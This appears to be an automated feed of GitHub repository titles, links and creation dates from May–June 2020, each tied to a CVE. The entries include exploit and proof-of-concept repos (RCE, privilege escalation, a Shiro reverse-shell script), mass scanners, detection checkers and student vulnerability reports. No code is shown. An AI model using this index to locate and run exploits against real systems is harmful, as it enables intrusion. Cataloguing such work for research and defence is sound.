**A smol bash script I threw together pretty quickly to scan for vulnerable versions of the Apache Tomcat RCE. I'll give it some love when I have the time.** : [DeviantSec/CVE-2020-9484-Scanner](https://github.com/DeviantSec/CVE-2020-9484-Scanner) create time: 2020-06-09T04:13:51Z

**Zeek script to detect servers vulnerable to CVE-2020-13777** : [0xxon/cve-2020-13777](https://github.com/0xxon/cve-2020-13777) create time: 2020-06-09T01:11:10Z

**Exploit CVE-2020-13886 - LFI Intelbras TIP 200 / 200 LITE /** : [lucxssouza/CVE-2020-13886](https://github.com/lucxssouza/CVE-2020-13886) create time: 2020-06-08T20:52:04Z

**no description** : [xxg141/Silent-JPG-Exploit-CVE-2019](https://github.com/xxg141/Silent-JPG-Exploit-CVE-2019) create time: 2020-06-08T15:19:50Z

**This is the exploit of CVE-2019-17240.** : [pingport80/CVE-2019-17240](https://github.com/pingport80/CVE-2019-17240) create time: 2020-06-08T15:05:24Z

**Vulnerability checker for Callstranger (CVE-2020-12695)** : [yunuscadirci/CallStranger](https://github.com/yunuscadirci/CallStranger) create time: 2020-06-08T07:37:49Z

**Manually Reverted SimpleFileList 1.7 plugin for Wordpress to explore CVE-2020-12832** : [0x05010705/simplefilelist1.7](https://github.com/0x05010705/simplefilelist1.7) create time: 2020-06-07T23:57:08Z

**Vulnerability demonstration for Django CVE-2020-13254** : [danpalmer/django-cve-2020-13254](https://github.com/danpalmer/django-cve-2020-13254) create time: 2020-06-07T16:42:33Z

**Triggering and Analyzing Android Kernel Vulnerability CVE-2019-2215** : [sharif-dev/AndroidKernelVulnerability](https://github.com/sharif-dev/AndroidKernelVulnerability) create time: 2020-06-07T15:03:07Z

**Citrix Workspace app before 1912 for Windows - Privilege Escalation #2** : [hessandrew/CVE-2020-13884](https://github.com/hessandrew/CVE-2020-13884) create time: 2020-06-07T15:00:03Z

**Citrix Workspace app before 1912 for Windows - Privilege Escalation #1** : [hessandrew/CVE-2020-13885](https://github.com/hessandrew/CVE-2020-13885) create time: 2020-06-07T14:49:46Z

**Proof of Concept for CVE-2020-10759 (fwupd signature validation bypass)** : [justinsteven/CVE-2020-10759-poc](https://github.com/justinsteven/CVE-2020-10759-poc) create time: 2020-06-06T04:44:38Z

**CVE-2020-9484 Mass Scanner, Scan a list of urls for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE** : [osamahamad/CVE-2020-9484-Mass-Scan](https://github.com/osamahamad/CVE-2020-9484-Mass-Scan) create time: 2020-06-05T20:40:28Z

**no description** : [wyu0hop/CVE-2020-0096](https://github.com/wyu0hop/CVE-2020-0096) create time: 2020-06-05T08:26:27Z

**jackson jndi injection** : [Blyth0He/CVE-2020-8840](https://github.com/Blyth0He/CVE-2020-8840) create time: 2020-06-05T02:05:15Z

**CVE-2020-13889. The admin page of bludit have an XSS in the showAlert() function that dont sanitize user input leading them to execute an malicious code.** : [gh0st56/CVE-2020-13889](https://github.com/gh0st56/CVE-2020-13889) create time: 2020-06-04T21:35:22Z

**CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate** : [cybervaca/CVE-2019-16113](https://github.com/cybervaca/CVE-2019-16113) create time: 2020-06-04T16:06:44Z

**for Ubuntu 18.04, improve functions.** : [qerogram/CVE-2020-9484](https://github.com/qerogram/CVE-2020-9484) create time: 2020-06-04T14:19:12Z

**Enjoy hacking ;)** : [0x413x4/CVE-2019-1385](https://github.com/0x413x4/CVE-2019-1385) create time: 2020-06-03T22:06:49Z

**no description** : [ynots0ups/CVE-2019-16113](https://github.com/ynots0ups/CVE-2019-16113) create time: 2020-06-03T15:49:41Z

**CVE-2020_0796-exp** : [RonnieNiu/CVE-2020_0796-exp](https://github.com/RonnieNiu/CVE-2020_0796-exp) create time: 2020-06-03T04:58:45Z

**no description** : [asc0t6e/CVE-2020-0708](https://github.com/asc0t6e/CVE-2020-0708) create time: 2020-06-03T04:26:24Z

**CVE-2020-5410** : [dead5nd/config-demo](https://github.com/dead5nd/config-demo) create time: 2020-06-03T02:52:09Z

**Data Collection Related to Exim CVE-2019-10149** : [area1/exim-cve-2019-10149-data](https://github.com/area1/exim-cve-2019-10149-data) create time: 2020-06-03T02:27:01Z

**no description** : [84KaliPleXon3/CVE-2020-12078](https://github.com/84KaliPleXon3/CVE-2020-12078) create time: 2020-06-02T17:44:07Z

**no description** : [haneline/cve2020](https://github.com/haneline/cve2020) create time: 2020-06-02T14:55:22Z

**CVE-2020-0796-exp** : [ysyyrps123/CVE-2020-0796-exp](https://github.com/ysyyrps123/CVE-2020-0796-exp) create time: 2020-06-02T12:04:53Z

**CVE-2020-0796** : [ysyyrps123/CVE-2020-0796](https://github.com/ysyyrps123/CVE-2020-0796) create time: 2020-06-02T12:04:30Z

**Exploit for CVE-2020-9283 based on Go** : [brompwnie/CVE-2020-9283](https://github.com/brompwnie/CVE-2020-9283) create time: 2020-06-02T10:55:37Z

**POC for CVE-2019-7616 / ESA-2019-09** : [random-robbie/CVE-2019-7616](https://github.com/random-robbie/CVE-2019-7616) create time: 2020-06-02T07:28:13Z

**A proof-of-concept for CVE-2020-12753** : [shinyquagsire23/CVE-2020-12753-PoC](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) create time: 2020-06-01T21:58:42Z

**PoC exploit for VMware Cloud Director RCE (CVE-2020-3956)** : [aaronsvk/CVE-2020-3956](https://github.com/aaronsvk/CVE-2020-3956) create time: 2020-06-01T18:26:32Z

**CVE-2020-13457** : [alt3kx/CVE-2020-13457](https://github.com/alt3kx/CVE-2020-13457) create time: 2020-06-01T13:27:11Z

**CVE 2020-10135 a.k.a BIAS (Bluetooth Impersonation Attack)** : [marcinguy/CVE-2020-10135-BIAS](https://github.com/marcinguy/CVE-2020-10135-BIAS) create time: 2020-06-01T07:36:37Z

**CVE-2020-1066-EXP支持Windows 7和Windows Server 2008 R2操作系统** : [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) create time: 2020-06-01T04:44:05Z

**no description** : [nmurilo/CVE-2008-4687-exploit](https://github.com/nmurilo/CVE-2008-4687-exploit) create time: 2020-05-30T04:53:07Z

**no description** : [HexChristmas/CVE-2020-1947](https://github.com/HexChristmas/CVE-2020-1947) create time: 2020-05-29T08:07:16Z

**The reproduction code for CVE-2019-8641.** : [chia33164/CVE-2019-8641-reproduction](https://github.com/chia33164/CVE-2019-8641-reproduction) create time: 2020-05-29T07:37:15Z

**This project for CVE-2019-18935** : [ThanHuuTuan/CVE_2019_18935](https://github.com/ThanHuuTuan/CVE_2019_18935) create time: 2020-05-29T07:29:52Z

**The tool is used to detect whether a server is vulnerable to Nginx Remote Integer Overflow CVE (2017-7529)** : [devansh3008/Cve_Finder_2017-7529](https://github.com/devansh3008/Cve_Finder_2017-7529) create time: 2020-05-29T07:22:43Z

**no description** : [yukar1z0e/CVE-2017-15944](https://github.com/yukar1z0e/CVE-2017-15944) create time: 2020-05-29T03:04:18Z

**no description** : [halsten/CVE-2020-0796](https://github.com/halsten/CVE-2020-0796) create time: 2020-05-28T08:41:12Z

**no description** : [CrackerCat/CVE-2020-11492](https://github.com/CrackerCat/CVE-2020-11492) create time: 2020-05-28T04:32:01Z

**no description** : [joshfinley/CVE-2020-11492](https://github.com/joshfinley/CVE-2020-11492) create time: 2020-05-27T18:11:18Z

**This is a simple test for Jackson** : [Al1ex/CVE-2020-24750](https://github.com/Al1ex/CVE-2020-24750) create time: 2020-05-27T13:42:11Z

**Nexus 3 越权漏洞利用脚本** : [zhzyker/CVE-2020-11444](https://github.com/zhzyker/CVE-2020-11444) create time: 2020-05-27T07:03:59Z

**CVE-2020-10204 远程命令执行脚本** : [zhzyker/CVE-2020-10204](https://github.com/zhzyker/CVE-2020-10204) create time: 2020-05-27T06:55:54Z

**CVE-2016-4437-Shiro反序列化爆破模块和key,命令执行,反弹shell的脚本** : [bkfish/Awesome_shiro](https://github.com/bkfish/Awesome_shiro) create time: 2020-05-27T05:02:04Z

**This is a simple test for FasterXML jackson-databind** : [Al1ex/CVE-2020-14195](https://github.com/Al1ex/CVE-2020-14195) create time: 2020-05-26T15:11:03Z

**win32k** : [DreamoneOnly/CVE-2019-0623-32-exp](https://github.com/DreamoneOnly/CVE-2019-0623-32-exp) create time: 2020-05-26T13:14:17Z

**no description** : [yukar1z0e/CVE-2019-19781](https://github.com/yukar1z0e/CVE-2019-19781) create time: 2020-05-26T08:00:22Z

**TelerikUI Vulnerability Scanner (CVE-2019-18935)** : [ThanHuuTuan/Telerik_CVE-2019-18935](https://github.com/ThanHuuTuan/Telerik_CVE-2019-18935) create time: 2020-05-25T08:37:51Z

**QNAP pre-auth root RCE Exploit (CVE-2019-7192 ~ CVE-2019-7195)** : [th3gundy/CVE-2019-7192_QNAP_Exploit](https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit) create time: 2020-05-24T15:44:29Z

**CVE-2019-12814:Jackson JDOM XSLTransformer Gadget** : [Al1ex/CVE-2019-12814](https://github.com/Al1ex/CVE-2019-12814) create time: 2020-05-24T04:33:55Z

**CVE-2020-2551 POC to use in Internet** : [Dido1960/Weblogic-CVE-2020-2551-To-Internet](https://github.com/Dido1960/Weblogic-CVE-2020-2551-To-Internet) create time: 2020-05-24T02:56:12Z

**vulnerabilidad CVE-2019-0708 testing y explotacion** : [nochemax/bLuEkEeP-GUI](https://github.com/nochemax/bLuEkEeP-GUI) create time: 2020-05-23T20:15:29Z

**Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS)** : [thelostworldFree/CVE-2020-7961-payloads](https://github.com/thelostworldFree/CVE-2020-7961-payloads) create time: 2020-05-23T17:01:57Z

**jackson unserialize** : [Al1ex/CVE-2019-12086](https://github.com/Al1ex/CVE-2019-12086) create time: 2020-05-22T17:10:10Z

**saltstack CVE-2020-11652** : [fanjq99/CVE-2020-11652](https://github.com/fanjq99/CVE-2020-11652) create time: 2020-05-22T07:56:32Z

**no description** : [rmkn/cve-2020-8617](https://github.com/rmkn/cve-2020-8617) create time: 2020-05-22T05:40:55Z

**CVE-2017-17485:Jackson-databind RCE** : [Al1ex/CVE-2017-17485](https://github.com/Al1ex/CVE-2017-17485) create time: 2020-05-22T03:28:49Z

**no description** : [HKirito/phpmyadmin4.4_cve-2016-5734](https://github.com/HKirito/phpmyadmin4.4_cve-2016-5734) create time: 2020-05-22T02:37:42Z

**CVE-2019-8656 GateKeeper Bypass** : [D00MFist/CVE-2019-8656](https://github.com/D00MFist/CVE-2019-8656) create time: 2020-05-21T22:41:59Z

**CVE-2020-10673:jackson-databind RCE** : [Al1ex/CVE-2020-10673](https://github.com/Al1ex/CVE-2020-10673) create time: 2020-05-21T14:56:30Z

**用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞** : [IdealDreamLast/CVE-2020-9484](https://github.com/IdealDreamLast/CVE-2020-9484) create time: 2020-05-21T14:30:46Z

**CVE-2020-11113:Jackson-databind RCE** : [Al1ex/CVE-2020-11113](https://github.com/Al1ex/CVE-2020-11113) create time: 2020-05-21T14:00:33Z

**Puma, CVE-2020-11076 and CVE-2020-11077** : [dentarg/cougar](https://github.com/dentarg/cougar) create time: 2020-05-21T10:55:22Z

**no description** : [AndreyChertckov/django_cve_2019_19844_poc](https://github.com/AndreyChertckov/django_cve_2019_19844_poc) create time: 2020-05-21T10:03:27Z

**Checker for QNAP pre-auth root RCE (CVE-2019-7192 ~ CVE-2019-7195)** : [cycraft-corp/cve-2019-7192-check](https://github.com/cycraft-corp/cve-2019-7192-check) create time: 2020-05-21T09:14:28Z

**no description** : [masahiro331/CVE-2020-9484](https://github.com/masahiro331/CVE-2020-9484) create time: 2020-05-21T00:41:06Z

**CVE-2018-6574** : [darthvader-htb/CVE-2018-6574](https://github.com/darthvader-htb/CVE-2018-6574) create time: 2020-05-20T18:05:30Z

**PoC for CVE-2020-8617 (BIND)** : [knqyf263/CVE-2020-8617](https://github.com/knqyf263/CVE-2020-8617) create time: 2020-05-20T12:26:45Z

**no description** : [masahiro331/CVE-2020-8165](https://github.com/masahiro331/CVE-2020-8165) create time: 2020-05-20T04:27:52Z

**Try to reproduce this issue with Docker** : [matinciel/Wordpress_CVE-2019-9787](https://github.com/matinciel/Wordpress_CVE-2019-9787) create time: 2020-05-19T22:09:43Z

**Cisco AnyConnect < 4.8.02042 privilege escalation through path traversal** : [goichot/CVE-2020-3153](https://github.com/goichot/CVE-2020-3153) create time: 2020-05-19T18:59:26Z

**Exploit code for CVE-2020-11579, an arbitrary file disclosure through the MySQL client in PHPKB** : [ShielderSec/CVE-2020-11579](https://github.com/ShielderSec/CVE-2020-11579) create time: 2020-05-19T13:12:48Z

**A fork of an old version of egg-scripts** : [erik-krogh/egg-scripts-CVE-2018-3786](https://github.com/erik-krogh/egg-scripts-CVE-2018-3786) create time: 2020-05-19T12:21:16Z

**tomcat使用了自带session同步功能时,不安全的配置(没有使用EncryptInterceptor)导致存在的反序列化漏洞,通过精心构造的数据包, 可以对使用了tomcat自带session同步功能的服务器进行攻击。PS:这个不是CVE-2020-9484,9484是session持久化的洞,这个是session集群同步的洞!** : [threedr3am/tomcat-cluster-session-sync-exp](https://github.com/threedr3am/tomcat-cluster-session-sync-exp) create time: 2020-05-19T05:12:53Z

**Tool to try multiple paths for PHPunit RCE CVE-2017-9841** : [RandomRobbieBF/phpunit-brute](https://github.com/RandomRobbieBF/phpunit-brute) create time: 2020-05-18T20:55:05Z

**Bluetooth Impersonation AttackS (BIAS) [CVE 2020-10135]** : [francozappa/bias](https://github.com/francozappa/bias) create time: 2020-05-18T18:57:29Z

**HP LinuxKI <= v6.0-1 "kivis.php" Remote Command Injection** : [cwinfosec/CVE-2020-7209](https://github.com/cwinfosec/CVE-2020-7209) create time: 2020-05-18T03:34:40Z

**no description** : [yukar1z0e/CVE-2018-13379](https://github.com/yukar1z0e/CVE-2018-13379) create time: 2020-05-18T01:37:13Z

**no description** : [DreamoneOnly/CVE-2019-1458-malware](https://github.com/DreamoneOnly/CVE-2019-1458-malware) create time: 2020-05-17T13:35:48Z

**no description** : [DreamoneOnly/CVE-2018-8120](https://github.com/DreamoneOnly/CVE-2018-8120) create time: 2020-05-17T13:32:07Z

**no description** : [DreamoneOnly/CVE-2020-0796-LPE](https://github.com/DreamoneOnly/CVE-2020-0796-LPE) create time: 2020-05-17T13:27:36Z

**no description** : [DreamoneOnly/CVE-2019-0808-32-64-exp](https://github.com/DreamoneOnly/CVE-2019-0808-32-64-exp) create time: 2020-05-17T13:13:15Z

**TelerikUI Vulnerability Scanner (CVE-2019-18935)** : [becrevex/Telerik_CVE-2019-18935](https://github.com/becrevex/Telerik_CVE-2019-18935) create time: 2020-05-17T04:22:45Z

**Weblogic Vuln POC EXP cve-2020-2551 cve-2020-2555 cve-2020-2883 ,。。。** : [zzwlpx/weblogicPoc](https://github.com/zzwlpx/weblogicPoc) create time: 2020-05-16T03:01:32Z

**Smb Usermap Destoyer is a python2 exploit for CVE-2007-2447 ( 'Username' map script' Command Execution ).** : [nickvourd/smb-usermap-destroyer](https://github.com/nickvourd/smb-usermap-destroyer) create time: 2020-05-16T01:36:28Z

**no description** : [cdedmondson/Modified-CVE-2015-3306-Exploit](https://github.com/cdedmondson/Modified-CVE-2015-3306-Exploit) create time: 2020-05-15T17:44:41Z

**CVE-2018-10933_Scanner** : [JoSecMx/CVE-2018-10933_Scanner](https://github.com/JoSecMx/CVE-2018-10933_Scanner) create time: 2020-05-15T17:18:31Z

**PoC for CVE-2020-3153 Cisco AnyConnect Secure Mobility Client EoP** : [raspberry-pie/CVE-2020-3153](https://github.com/raspberry-pie/CVE-2020-3153) create time: 2020-05-15T11:40:02Z

**Bolt-cms 3.6.10 Csrf -> xss -> rce** : [r3m0t3nu11/CVE-2019-1759-csrf-js-rce](https://github.com/r3m0t3nu11/CVE-2019-1759-csrf-js-rce) create time: 2020-05-15T10:54:20Z

**CVE-2020-10199 回显版本** : [aleenzz/CVE-2020-10199](https://github.com/aleenzz/CVE-2020-10199) create time: 2020-05-15T06:12:51Z

**POC Script for CVE-2020-12800: RCE through Unrestricted File Type Upload** : [amartinsec/CVE-2020-12800](https://github.com/amartinsec/CVE-2020-12800) create time: 2020-05-15T01:50:36Z

**A bluetooth-related vulnerability in some contact tracing apps** : [alwentiu/COVIDSafe-CVE-2020-12856](https://github.com/alwentiu/COVIDSafe-CVE-2020-12856) create time: 2020-05-15T00:18:03Z

**PoC for CVE-2009-0229 "Print Spooler Read File Vulnerability" LPE AFR (related to CVE-2020-1048)** : [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC) create time: 2020-05-14T19:40:50Z

**ES File Explorer Open Port Vulnerability - CVE-2019-6447** : [SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447](https://github.com/SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447) create time: 2020-05-14T13:22:54Z

**Check CVE-2020-11932 (ubuntu server) and test host relating to this vulnerability** : [Staubgeborener/CVE-2020-11932](https://github.com/Staubgeborener/CVE-2020-11932) create time: 2020-05-14T11:47:52Z

**no description** : [wuxx/CVE-2020-8004](https://github.com/wuxx/CVE-2020-8004) create time: 2020-05-14T03:52:58Z

**no description** : [stevenseeley/HowCVE-2019-1083Works](https://github.com/stevenseeley/HowCVE-2019-1083Works) create time: 2020-05-13T18:17:19Z

**PoC for CVE-2020-1015** : [0xeb-bp/cve-2020-1015](https://github.com/0xeb-bp/cve-2020-1015) create time: 2020-05-13T16:42:17Z

**practice** : [0xddaa/CVE-2018-10388](https://github.com/0xddaa/CVE-2018-10388) create time: 2020-05-13T14:52:43Z

**Proof of concept for Weblogic CVE-2020-2883** : [MagicZer0/Weblogic_CVE-2020-2883_POC](https://github.com/MagicZer0/Weblogic_CVE-2020-2883_POC) create time: 2020-05-13T09:56:48Z

**Eternalblue Exploit Was Developed By The NSA Which Is The National Security Agency In United States. Essentially What Happened Or How It Was Released Is That There Were Few Testimonies From NSA Employees, And It Was Leaked By The Shadow Brokers Hacker Group On April 14th 2017.And Then It Was Utilized Worldwide For The WANNACRY Ransomware attack and it was used to share the ransomware all around the world. Eternalblue Exploit a vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. And the exploit is denoted under the entry CVE 2017 0 144.The vulnerability exists because the SMB version 1 (SMBv1) server in various versions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target computer.it is exist in different versions of windows and essentially what it does is it mishandles especially crafted packets that are been sent from the remote hackers and allowing this hackers to execute arbitrary code on the target computer. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption** : [477Hashini/-Exploitation-Of-EternalBlue-DoublePulsar-Windows-7-64bit--Demo](https://github.com/477Hashini/-Exploitation-Of-EternalBlue-DoublePulsar-Windows-7-64bit--Demo) create time: 2020-05-13T08:46:47Z

**Microsoft Windows - 'afd.sys' Local Kernel Privilege Escalation Exploit Report (CVE-2011-1249)** : [Madusanka99/OHTS](https://github.com/Madusanka99/OHTS) create time: 2020-05-13T04:17:48Z

**no description** : [teddy47/CVE-2019-13272---Documentation](https://github.com/teddy47/CVE-2019-13272---Documentation) create time: 2020-05-13T03:28:45Z

**CVE-2018-20250漏洞利用** : [lxg5763/cve-2018-20250](https://github.com/lxg5763/cve-2018-20250) create time: 2020-05-13T03:28:04Z

**CVE-2004-1769 // Mass cPanel Reset password** : [Redsplit/shiguresh](https://github.com/Redsplit/shiguresh) create time: 2020-05-13T03:18:46Z

**no description** : [Thathsarani24/CVE2019-13272](https://github.com/Thathsarani24/CVE2019-13272) create time: 2020-05-12T21:40:43Z

**Document on Linux Kernal Vulnerability CVE-2016-0728 and Exploitation** : [th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit](https://github.com/th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit) create time: 2020-05-12T21:30:26Z

**A WebUSB based payload launcher for devices vulnerable to CVE-2018-6242** : [ChrisFigura/react-tegra-payload-launcher](https://github.com/ChrisFigura/react-tegra-payload-launcher) create time: 2020-05-12T20:39:24Z

**Dirtycow also is known as CVE-2016-5195** : [KaviDk/dirtyCow](https://github.com/KaviDk/dirtyCow) create time: 2020-05-12T20:38:07Z

**no description** : [Dilith006/CVE-2014-6271](https://github.com/Dilith006/CVE-2014-6271) create time: 2020-05-12T18:37:14Z

**no description** : [sanjana123-cloud/CVE-2019-18683](https://github.com/sanjana123-cloud/CVE-2019-18683) create time: 2020-05-12T18:31:36Z

**This document explain Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [CVE-2019-19781]** : [Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201](https://github.com/Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201) create time: 2020-05-12T18:10:19Z

**no description** : [ducnp/CVE-2019-CONF](https://github.com/ducnp/CVE-2019-CONF) create time: 2020-05-12T18:06:48Z

**CVE-2020-1938 exploit** : [Umesh2807/Ghostcat](https://github.com/Umesh2807/Ghostcat) create time: 2020-05-12T18:03:59Z

**no description** : [Avishka991/CVE-Privilege-Escalation-2019-13272-](https://github.com/Avishka991/CVE-Privilege-Escalation-2019-13272-) create time: 2020-05-12T18:00:34Z

**Local Root vulnerability- CVE-2019-13272 / Security Bypass Vulnerability – CVE-2019-14287/Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538** : [Tharana/vulnerability-exploitation](https://github.com/Tharana/vulnerability-exploitation) create time: 2020-05-12T17:59:48Z

**no description** : [AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378](https://github.com/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378) create time: 2020-05-12T17:53:57Z

**Report for Exploit Assignment. Topic Selected: CVE 2020-7274** : [Caj6r/SNP_report_assignement_IT19009278](https://github.com/Caj6r/SNP_report_assignement_IT19009278) create time: 2020-05-12T17:52:00Z

**This is an individual assignment for secure network programming** : [rashmikadileeshara/CVE-2014-6271-Shellshock-](https://github.com/rashmikadileeshara/CVE-2014-6271-Shellshock-) create time: 2020-05-12T17:51:06Z

**CVE-2019-6111 vulnerability exploitation** : [53n7hu/SNP](https://github.com/53n7hu/SNP) create time: 2020-05-12T17:48:26Z

**this is an individual assignment for system network programming** : [sandeeparth07/CVE-2016_5195-vulnarability](https://github.com/sandeeparth07/CVE-2016_5195-vulnarability) create time: 2020-05-12T17:32:48Z

**no description** : [dinidhu96/IT19013756_-CVE-2016-4971-](https://github.com/dinidhu96/IT19013756_-CVE-2016-4971-) create time: 2020-05-12T17:32:46Z

**no description** : [BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074](https://github.com/BimsaraMalinda/Linux-Kernel-4.4.0-Ubuntu---DCCP-Double-Free-Privilege-Escalation-CVE-2017-6074) create time: 2020-05-12T17:13:43Z

**This is a Dirty Cow (CVE-2016-5195) privilege escalation vulnerability exploit** : [dulanjaya23/Dirty-Cow-CVE-2016-5195-](https://github.com/dulanjaya23/Dirty-Cow-CVE-2016-5195-) create time: 2020-05-12T17:10:38Z

**Exploit work Privilege Escalation CVE-2017-1000112** : [IT19083124/SNP-Assignment](https://github.com/IT19083124/SNP-Assignment) create time: 2020-05-12T17:07:11Z

**This is my SNP project where my ID is IT19366128** : [SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328](https://github.com/SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328) create time: 2020-05-12T17:02:44Z

**no description** : [DewmiApsara/CVE-2019-14287](https://github.com/DewmiApsara/CVE-2019-14287) create time: 2020-05-12T16:56:59Z

**no description** : [janod313/-CVE-2019-14287-SUDO-bypass-vulnerability](https://github.com/janod313/-CVE-2019-14287-SUDO-bypass-vulnerability) create time: 2020-05-12T16:53:23Z

**CVE-2017-5638** : [pasannirmana/Aspire](https://github.com/pasannirmana/Aspire) create time: 2020-05-12T16:42:51Z

**no description** : [Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-](https://github.com/Lumindu/CVE-2017-16995-Linux-Kernel---BPF-Sign-Extension-Local-Privilege-Escalation-) create time: 2020-05-12T16:19:10Z

**no description** : [Prabhashaka/IT19147192-CVE-2020-8835](https://github.com/Prabhashaka/IT19147192-CVE-2020-8835) create time: 2020-05-12T16:18:31Z

**no description** : [alokaranasinghe/cve-2019-11043](https://github.com/alokaranasinghe/cve-2019-11043) create time: 2020-05-12T16:09:59Z

**CVE-2017-8759 | .NET Framework Remote Code Execution Vulnerability** : [GayashanM/OHTS](https://github.com/GayashanM/OHTS) create time: 2020-05-12T16:00:39Z

**no description** : [Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-](https://github.com/Dilan-Diaz/Point-to-Point-Protocol-Daemon-RCE-Vulnerability-CVE-2020-8597-) create time: 2020-05-12T15:55:08Z

**This is about CVE-2020-1938** : [I-Runtime-Error/CVE-2020-1938](https://github.com/I-Runtime-Error/CVE-2020-1938) create time: 2020-05-12T15:54:28Z

**no description** : [SachinThanushka/CVE-2018-1160](https://github.com/SachinThanushka/CVE-2018-1160) create time: 2020-05-12T15:37:20Z

**no description** : [lalishasanduwara/CVE-2018-10933](https://github.com/lalishasanduwara/CVE-2018-10933) create time: 2020-05-12T15:34:48Z

**SNP Assignment on a Linux vulnerability** : [Dilshan-Eranda/CVE-2019-10149](https://github.com/Dilshan-Eranda/CVE-2019-10149) create time: 2020-05-12T15:11:54Z

**CVE-2017-8759 || report related with execute code vulnerability** : [varunsaru/SNP](https://github.com/varunsaru/SNP) create time: 2020-05-12T15:11:42Z

**This is the exploitation of sudo security bypass vulnerability** : [thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-](https://github.com/thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-) create time: 2020-05-12T15:00:57Z

**CVE-2019-5736** : [shen54/IT19172088](https://github.com/shen54/IT19172088) create time: 2020-05-12T14:47:27Z

**This is a brief exploitation of CVE-2019-14287 Sudo Security Bypass Vulnerability.** : [ejlevin99/Sudo-Security-Bypass-Vulnerability](https://github.com/ejlevin99/Sudo-Security-Bypass-Vulnerability) create time: 2020-05-12T14:45:54Z

**SMBGhost CVE-2020-0796** : [bacth0san96/SMBGhostScanner](https://github.com/bacth0san96/SMBGhostScanner) create time: 2020-05-12T14:41:27Z

**Glibc-Vulnerability-Exploit-CVE-2015-7547** : [Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547](https://github.com/Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547) create time: 2020-05-12T14:32:41Z

**SNP Assignment 1 Report - Linux box exploitation ( Vulnerability CVE-2014-0038)** : [kiruthikan99/IT19115276](https://github.com/kiruthikan99/IT19115276) create time: 2020-05-12T12:35:12Z

**no description** : [RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-](https://github.com/RashmikaEkanayake/Privilege-Escalation-CVE-2019-13272-) create time: 2020-05-12T11:53:55Z

**no description** : [sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-](https://github.com/sachinthaBS/Spectre-Vulnerability-CVE-2017-5753-) create time: 2020-05-12T10:57:11Z

**no description** : [ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287](https://github.com/ShianTrish/sudo-Security-Bypass-vulnerability-CVE-2019-14287) create time: 2020-05-12T10:16:49Z

**no description** : [p1gz/CVE-2017-5941-NodeJS-RCE](https://github.com/p1gz/CVE-2017-5941-NodeJS-RCE) create time: 2020-05-12T07:33:37Z

**no description** : [shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-](https://github.com/shanuka-ashen/Dirty-Cow-Explanation-CVE-2016-5195-) create time: 2020-05-11T19:25:26Z

**Sudo Security Policy bypass Vulnerability** : [HussyCool/CVE-2019-14287-IT18030372-](https://github.com/HussyCool/CVE-2019-14287-IT18030372-) create time: 2020-05-11T19:19:17Z

**Exploit code for CVE-2015-5477 POC** : [xycloops123/TKEY-remote-DoS-vulnerability-exploit](https://github.com/xycloops123/TKEY-remote-DoS-vulnerability-exploit) create time: 2020-05-11T18:01:09Z

**Documentation for Sudo Security Bypass - CVE 2019-14287** : [SachinthaDeSilva-cmd/Exploit-CVE-2019-14287](https://github.com/SachinthaDeSilva-cmd/Exploit-CVE-2019-14287) create time: 2020-05-11T16:40:12Z

**judge vulnerability of the target** : [Jerry-Swift/CVE-2019-19781-scanner](https://github.com/Jerry-Swift/CVE-2019-19781-scanner) create time: 2020-05-11T13:31:05Z

**Code for exploit for CVE-2020-12717** : [wabzqem/covidsafe-CVE-2020-12717-exploit](https://github.com/wabzqem/covidsafe-CVE-2020-12717-exploit) create time: 2020-05-11T13:09:52Z

**Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538** : [Tharana/Android-vulnerability-exploitation](https://github.com/Tharana/Android-vulnerability-exploitation) create time: 2020-05-11T11:34:27Z

**Local Root vulnerability- CVE-2019-13272 / Security Bypass Vulnerability – CVE-2019-14287** : [Tharana/Exploiting-a-Linux-kernel-vulnerability](https://github.com/Tharana/Exploiting-a-Linux-kernel-vulnerability) create time: 2020-05-11T11:24:29Z

**A remote code execution flaw was found in Samba. A malicious authenticated samba client, having write access to the samba share, could use this flaw to execute arbitrary code as root.** : [Hansindu-M/CVE-2017-7494_IT19115344](https://github.com/Hansindu-M/CVE-2017-7494_IT19115344) create time: 2020-05-10T21:17:55Z

**Double-Free BUG in WhatsApp exploit poc.** : [ProjectorBUg/CVE-2020-11932](https://github.com/ProjectorBUg/CVE-2020-11932) create time: 2020-05-10T15:25:59Z

